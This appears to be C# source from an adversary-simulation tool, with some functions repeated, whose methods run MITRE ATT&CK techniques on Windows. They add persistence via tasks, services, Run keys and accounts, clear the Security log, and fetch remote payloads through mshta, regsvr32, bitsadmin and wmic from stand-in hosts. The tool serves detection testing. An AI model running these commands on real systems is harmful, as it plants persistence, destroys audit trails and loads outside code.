public static void CreateScheduledTaskCmd(string log, bool cleanup) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1053.005"); logger.TimestampInfo("Using the command line to execute the technique"); try { string taskName = "BadScheduledTask"; string binpath = @"C:\Windows\Temp\xyz12345.exe"; ExecutionHelper.StartProcess("", String.Format(@"SCHTASKS /CREATE /SC DAILY /TN {0} /TR ""{1}"" /ST 13:00", taskName, binpath), logger); if (cleanup) { ExecutionHelper.StartProcess("", String.Format(@"SCHTASKS /DELETE /F /TN {0}", taskName, binpath), logger); Thread.Sleep(3000); } else { logger.TimestampInfo(@"The created Scheduled Task " + taskName + " was not deleted as part of the simulation"); } logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
public static void CreateLocalAccountCmd(string log, bool cleanup) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1136.001"); logger.TimestampInfo("Using the command line to execute the technique"); try { string username = "******"; string pwd = "Passw0rd123El7"; ExecutionHelper.StartProcess("", String.Format("net user {0} {1} /add", username, pwd), logger); Thread.Sleep(2000); if (cleanup) { ExecutionHelper.StartProcess("", String.Format("net user {0} /delete", username), logger); } else { logger.TimestampInfo(String.Format("The created local user {0} was not deleted as part of the simulation", username)); } logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
public static void CreateWindowsServiceCmd(string log, bool cleanup) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1543.003"); logger.TimestampInfo("Using the command line to execute the technique"); try { string serviceName = "UpdaterService"; string servicePath = @"C:\Windows\Temp\superlegit.exe"; ExecutionHelper.StartProcess("", String.Format(@"sc create {0} binpath= {1} type= own start= auto", serviceName, servicePath), logger); Thread.Sleep(3000); if (cleanup) { ExecutionHelper.StartProcess("", String.Format(@"sc delete {0}", serviceName), logger); } else { logger.TimestampInfo(String.Format("The created Service: {0} ImagePath: {1} was not deleted as part of the simulation", serviceName, servicePath)); } } catch (Exception ex) { logger.SimulationFailed(ex); } }
public static void CreateRegistryRunKeyCmd(string log, bool cleanup) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1547.001"); logger.TimestampInfo("Using the command line to execute the technique"); try { string regKey = "BadApp"; string binpath = @"C:\Windows\Temp\xyz12345.exe"; ExecutionHelper.StartProcess("", String.Format(@"REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V {0} /t REG_SZ /F /D {1}", regKey, binpath), logger); if (cleanup) { Thread.Sleep(3000); ExecutionHelper.StartProcess("", String.Format(@"REG DELETE HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V {0} /F", regKey), logger); } else { logger.TimestampInfo(@"The created RegKey : HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" + regKey + " was not deleted as part of the simulation"); } logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
static public void WindowsCommandShell(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1059.003"); try { ExecutionHelper.StartProcess("", "cmd.exe /C whoami", logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
static public void SystemNetworkConfigurationDiscovery(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1016"); try { ExecutionHelper.StartProcess("", "ipconfig /all", logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
static public void FileAndDirectoryDiscovery(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1083"); try { ExecutionHelper.StartProcess("", @"dir c:\ >> %temp%\download", logger); ExecutionHelper.StartProcess("", @"dir C:\Users\ >> %temp%\download", logger, true); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
public static void ClearSecurityEventLogCmd(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1070.001"); logger.TimestampInfo("Using the command line to execute the technique"); try { ExecutionHelper.StartProcess("", "wevtutil.exe cl Security", logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
public static void InstallUtil(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1218.004"); try { string file = @"C:\Windows\Temp\XKNqbpzl.exe"; ExecutionHelper.StartProcess("", String.Format(@"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfiles /LogToConsole=alse /U {0}", file), logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
public static void Mshta(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1218.005"); try { string url = "http://webserver/payload.hta"; ExecutionHelper.StartProcess("", String.Format("mshta {0}", url), logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
static public void ExecutePowershell(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1086"); try { string encodedPwd = "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMgAwAA=="; ExecutionHelper.StartProcess("", String.Format("powershell.exe -enc {0}", encodedPwd), logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
public static void XlScriptProcessing(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1220"); try { string url = "http://webserver/payload.xsl"; ExecutionHelper.StartProcess("", String.Format("wmic os get /FORMAT:\"{0}\"", url), logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
public static void Csmtp(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1218.003"); try { string file = @"C:\Users\Administrator\AppData\Local\Temp\XKNqbpzl.txt"; ExecutionHelper.StartProcess("", String.Format("cmstp /s /ns {0}", file), logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
public static void SystemUserDiscovery(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1033"); try { ExecutionHelper.StartProcess("", "whoami", logger); ExecutionHelper.StartProcess("", "query user", logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
public static void Rundll32(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1218.011"); try { string file = @"C:\Windows\twain_64.dll"; ExecutionHelper.StartProcess("", String.Format("rundll32 \"{0}\"", file), logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
public static void SystemServiceDiscovery(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1007"); try { ExecutionHelper.StartProcess("", "net start", logger); ExecutionHelper.StartProcess("", "tasklist /svc", logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
static public void ServiceExecution(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1035"); try { ExecutionHelper.StartProcess("", "net start UpdaterService", logger); ExecutionHelper.StartProcess("", "sc start UpdaterService", logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
public static void ClearSecurityEventLogCmd(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1070"); //logger.TimestampInfo(String.Format("Starting T1070 Simulation on {0}", Environment.MachineName)); //logger.TimestampInfo(String.Format("Simulation agent running as {0} with PID:{1}", System.Reflection.Assembly.GetEntryAssembly().Location, Process.GetCurrentProcess().Id)); try { ExecutionHelper.StartProcess("", "wevtutil.exe cl Security", logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
public static void DeobfuscateDecode(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1140"); try { string encoded = "encodedb64.txt"; string decoded = "decoded.exe"; ExecutionHelper.StartProcess("", String.Format("certutil -decode {0} {1}", encoded, decoded), logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
public static void DomainAccountDiscoveryCmd(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1087.002"); logger.TimestampInfo("Using the command line to execute the technique"); try { ExecutionHelper.StartProcess("", "net user /domain", logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
static public void VisualBasic(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1059.005"); try { string file = "invoice0420.vbs"; ExecutionHelper.StartProcess("", String.Format("wscript.exe {0}", file), logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
public static void BitsJobs(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1197"); try { string url = "http://web.evil/sc.exe"; string file = @"C:\Windows\Temp\winword.exe"; ExecutionHelper.StartProcess("", String.Format("bitsadmin /transfer job /download /priority high {0} {1}", url, file), logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
public static void SystemNetworkConnectionsDiscovery(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1049"); try { ExecutionHelper.StartProcess("", "netstat", logger); ExecutionHelper.StartProcess("", "net use", logger); ExecutionHelper.StartProcess("", "net session", logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
static public void Regsvr32(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1218.010"); try { string url = @"http://malicious.domain:8080/payload.sct"; string dll = "scrobj.dll"; ExecutionHelper.StartProcess("", String.Format("regsvr32.exe /u /n /s /i:{0} {1}", url, dll), logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
public static void RegsvcsRegasm(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1218.009"); try { string file = @"winword.dll"; ExecutionHelper.StartProcess("", String.Format(@"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U {0}", file), logger); ExecutionHelper.StartProcess("", String.Format(@"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U {0}", file), logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
public static void SystemUserDiscovery(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1033"); //logger.TimestampInfo(String.Format("Starting T1033 Simulation on {0}", Environment.MachineName)); //logger.TimestampInfo(String.Format("Simulation agent running as {0} with PID:{1}", System.Reflection.Assembly.GetEntryAssembly().Location, Process.GetCurrentProcess().Id)); try { ExecutionHelper.StartProcess("", "whoami", logger); ExecutionHelper.StartProcess("", "query user", logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
public static void LocalGroups(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1069.001"); logger.TimestampInfo("Using the command line to execute the technique"); try { ExecutionHelper.StartProcess("", "net localgroup", logger); ExecutionHelper.StartProcess("", "net localgroup \"Administrators\"", logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
public static void AccountDiscoveryCmd(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1087"); //logger.TimestampInfo(String.Format("Starting T1087 Simulation on {0}", Environment.MachineName)); //logger.TimestampInfo(String.Format("Simulation agent running as {0} with PID:{1}", System.Reflection.Assembly.GetEntryAssembly().Location, Process.GetCurrentProcess().Id)); try { //ExecutionHelper.StartProcess("", "net group \"Domain Admins\" /domain", log); ExecutionHelper.StartProcess("", "net user /domain", logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
public static void SystemTimeDiscovery(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1124"); logger.TimestampInfo("Using the command line to execute the technique"); try { ExecutionHelper.StartProcess("", "w32tm /tz", logger); ExecutionHelper.StartProcess("", "time /T", logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
public static void SecuritySoftwareDiscovery(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1518.001"); logger.TimestampInfo("Using the command line to execute the technique"); try { ExecutionHelper.StartProcess("", "netsh advfirewall firewall show rule name=all", logger); ExecutionHelper.StartProcess("", "wmic / Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get displayName / Format:List", logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }